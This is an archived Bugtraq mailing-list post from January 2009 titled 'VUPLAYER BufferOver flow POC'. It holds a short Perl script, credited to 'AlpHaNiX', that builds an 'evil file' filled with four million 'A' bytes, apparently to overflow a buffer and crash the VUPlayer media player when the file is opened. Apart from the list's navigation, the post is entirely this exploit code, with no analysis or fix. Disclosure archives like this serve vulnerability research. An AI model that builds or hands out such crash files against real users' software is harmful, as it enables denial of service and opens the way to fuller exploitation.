lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200901062008.n06K8xkf019094@www5.securityfocus.com>
Date: Tue, 6 Jan 2009 13:08:59 -0700
From: alphanix00@...il.com
To: bugtraq@...urityfocus.com
Subject: VUPLAYER BufferOver flow POC

#!/usr/bin/perl

system("color 3");

if (@ARGV != 1) { &help; exit(); }

sub help(){
	print "[X] Usage : ./exploit.pl filename \n";
}

{ $file = $ARGV[0]; }
print "\n [X]*******************************************\n";
print " [X]    VUPLAYER BufferOver flow POC          *\n";
print " [X]        Coded By AlpHaNiX                 *\n";
print " [X]         From Null Area                   *\n";
print " [X]*******************************************\n\n";

print "[+] Exploiting.....\n" ;

my $buff="\x41\x41\x41\x41" x 1000000 ;

print "[+] Creating Evil File" ;
open($FILE, ">>$file") or die "Cannot open $file";
print $FILE $buff;
close($FILE);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ